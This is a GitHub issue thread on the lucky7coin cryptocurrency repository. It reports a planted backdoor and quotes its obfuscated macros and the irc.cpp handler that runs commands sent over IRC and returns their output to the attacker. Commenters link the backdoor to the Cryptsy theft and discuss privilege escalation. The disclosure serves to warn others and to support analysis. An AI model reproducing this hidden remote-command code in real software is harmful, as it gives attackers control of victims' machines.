alerj78 / lucky7coin

MIT License
7 stars 13 forks source link

backdoor in IRC code #1

Open dooglus opened 9 years ago

dooglus commented 9 years ago

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c

/**
 * OS-dependent memory page locking/unlocking.
 * Defined as policy class to make stubbing for test possible.
 */
#define CLine S_ORDER(I,F,E,L)

/**
 * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
 * std::allocator templates.
 */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)

//
// Allocator that locks its contents from being paged
// out of memory and clears its contents before deletion.
//
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

        if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

n4ru commented 8 years ago

Too little too late, sadly.

BitPopCoin commented 8 years ago

First of all, are they retarded and not put each shitcoin in a vm? Second vern probably stole it and is now in China.

No vm and no manual compiling of random shitcoin? Vern cant keep his lies straight. I segregated my own bitpopcoin even when I compiled it myself. DO is only $5/month.

This Trojan is just a story vern found after the fact to facilitate his lies.

presstab commented 8 years ago

good find dooglus

creativecuriosity commented 8 years ago

Too little too late, sadly.

....

dooglus commented on Mar 8, 2015

ofeefee commented 8 years ago

Whoa!

n4ru commented 8 years ago

@creativecuriousity

That's about a year after the theft took place.

presstab commented 8 years ago

First post I can find about this backdoor is from BCT mods https://bitcointalk.org/index.php?topic=935898.0

saddam213 commented 8 years ago

That's actually quite clever, added this one to my exploit scanner script

Good spotting sir

mrzacsmith commented 8 years ago

So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result. I mean, seems since a 'newbie' on btctalk with an account one day old would warrant some review at a minimum when dealing with such a serious topic. I feel for all in the crypto community that lost coins due to either greed, fraud or incompetence.

dooglus commented 8 years ago

Apparently this is the theft transaction, included In block 313009 (2014-07-29), 8 months before my bug report.

Good spotting sir

I can't take any credit for spotting it. I originally heard of this backdoor in this forum post (January 25, 2015), was curious how the exploit worked, and ended up posting the macro code here so others could more easily understand it, and also to warn others who might fork this codebase.

sidhujag commented 8 years ago

Interesting that the coins havent moved? Would be funny if he accidentily sent to an address he didnt own lol

mrzacsmith commented 8 years ago

HAHA, that would be well deserved @sidhujag ~~ least the scum would not profit and still have an army of crypto fans hunting his head.

saddam213 commented 8 years ago

Cryptsy never should have had that much in hot wallets, 300k LTC and 16K in hot wallet, ridiculous

So any head hunting should be directed at them IMO

dooglus commented 8 years ago

Would be funny if he accidentily sent to an address he didnt own

Actually 11 different addresses that he didn't own...

Who steals 11k BTC and takes the time to split them up into 11 separate addresses in the theft transaction? That is just bizarre.

mrzacsmith commented 8 years ago

@dooglus so true, could see it happening to one address, but 11 mistakes is highly improbable. I wonder if anyone has went through the LTC blockchain to see if 300k happened the same or near the same time.

sidhujag commented 8 years ago

maybe 11 people were involved lol

StarenseN commented 8 years ago

dooglus you nailed it. Waw.

jwg4 commented 8 years ago

Closing this as WONTFIX. This is a feature not a bug people.

BitPopCoin commented 8 years ago

Correct won't fix, busy on permanent vacation

doged commented 8 years ago

noticed this was also placed in torcoin

https://github.com/torcoindev/torcoin/blob/419f77729f1bf7fc0c3543d7e88e9c6a12e401a2/src/irc.cpp

doged commented 8 years ago

@jwg4 XD

DanielJoyce commented 8 years ago

also torcoin on reddit was created around the same time all of these backdoors were landing in various ignored/defunct/marginal cryptocurrencies

DanielJoyce commented 8 years ago

Looks all the torcoin accounts went silent after the cyptsy hack was successful.

https://cryptocointalk.com/topic/13084-torcoin-tor-information/

Check the twitter links. Dead since july 2014

shinohai commented 8 years ago

^LOL

Meler-Andy commented 8 years ago

No way Why always poor people have to loose :( I m so sad now lost plenty of coins from that backdoors now Cryptsy wont give them back :( sad angry and feel like i wanna start being a thief !!!!

ctrlcctrlv commented 8 years ago

@BitpopCoin At least segregate coins in different VMs depending on their total value - it's absurd that Vern would run random shitcoin wallet on the same machine as a private key with thousands of BTC. Also, that makes it a hot wallet, not cold storage as Vern claimed.

Cryptsy incompetent since day 1.

Frankenmint commented 8 years ago

ITT a shiton of people who come here after the fact when the OP found this nearly a year ago

dooglus commented 8 years ago

@ctrlcctrlv We don't know for sure that the lucky7coin and Bitcoin wallets were on the same server. It's possible the lucky7 backdoor was used to gain entry to the 'shitcoin' VM, and from there access was somehow gained to other servers.

BitPopCoin commented 8 years ago

This thread has no moderators hahaha.

bolivarcoin commented 8 years ago

lucky7 still hosted on cryptsy servers, so if really has a backdoor the scammers are very happy that cryptsy havnt de-listed https://www.cryptsy.com/markets/view/LK7_BTC

dooglus commented 8 years ago

@bolivarcoin See https://github.com/Mullick/lucky7coin/commit/799b0b6b65a8fdd827d0d1406868d34a045ea779.

Javihache commented 8 years ago

So TorCoin person/group and Lucky7Coin person/group might be the same... all trying to hit the jackpot with their Backdoor. They hit the Jackpot and disappeared, abandoning their shitcoin projects behind them. So far so good. Now why haven't the BTC Funds been moved? Have the guys been living on the LTC funds this far?

doged commented 8 years ago

@dooglus @Javihache paul mentioned on the cryptsy blog that he had alot of "open communication" with special agent shaun bridges, who is now in prison for scamming silk road out of btc.. so if we see those coins move when he gets out, we know who did it.. timeline coincides.

R32 commented 8 years ago

mark

ghost commented 8 years ago

See the good side about it - more prying eyes and people seeing and discussing this, so perhaps they will be able to more easily find deliberate backdoors like that (and perhaps even less so deliberate ones or better hidden ones too).

What strikes me the most is how simple it is in irc.cpp, even non-programmers can almost understand it as-is.

BitPopCoin commented 8 years ago

Or we can all just concentrate our efforts on Bitcoin and stop shitcoining

doged commented 8 years ago

says the guy named after a shitcoin, and has a couple shitcoins in his repo XD

BitPopCoin commented 8 years ago

Lol that was 2013, the shitcoin phase is done, fuck litecoin and paycoin. Also I abandoned BPC long ago.

Javihache commented 8 years ago

Litecoin is cool. Better Conf Times and all, scrypt... I like Litecoin, find it cool to have the "silver" and the "gold". But I still would like to know from you programming guys (I mean real programmers not like me), if there is a way to find out who that alerj78 is and how can be tracked down. Cause through stealing from Cryptsy, he stole from me and many others. And that is not cool.

doged commented 8 years ago

@Javihache it was most likely not this coin that is responsible, as i tested this and the way cryptsy is set up, it would not have been possible to steal bitcoins using this backdoor. this daemon would have to have been run as root, and not in its own vm.. so most likely this backdoor is not how cryptsy's bitcoin went missing.

dooglus commented 8 years ago

@doged Why do you say the daemon would need to have been run as root? I don't think that is the case.

doged commented 8 years ago

@dooglus you're correct, it would have to have been on the same machine as the cold storage bitcoin wallet though, and had permissions.

jwg4 commented 8 years ago

@doged: Typically a backdoor like this is used to get the first toehold on a target system. Once that has been done, different privilege escalation bugs or attacks to various services can be used to get admin access and/or access to other systems on the target network. This might include traditional software vulnerabilities, or things like searching emails for plaintext passwords, spying on terminal sessions, searching for code repositories or databases for critical data. Unless the system is built to be very robust internally, with security planned on the basis that backdoors like this one will exist, these attempts will usually succeed. People often don't secure their systems from attackers who have partial privileges, and they often don't monitor systems and check logs effectively, which should enable you to find an attacker during this process. Cryptsy claim that it took several months from the time they installed this code for the attacker to be able to take over their BTC and LTC wallets. This could have been the time taken to go from a single backdoor executing as a non-privileged user on an isolated VM running this coin, to having access to the most secret and valuable information held by Cryptsy.

pceccato commented 8 years ago

pardon my ignorance, but why would a crypocoin node require an IRC connection?

BitPopCoin commented 8 years ago

To find nodes to connect to

karelbilek commented 8 years ago

Even bitcoin has that

BitPopCoin commented 8 years ago

No bitcoin stopped that. Also it was never used in that direction.

Glittergates commented 2 years ago

I broke the bank

n4ru commented 2 years ago

blast from the past

ctrlcctrlv commented 2 years ago

image

lol remember when this shitcoin exchange still existed and had people defending it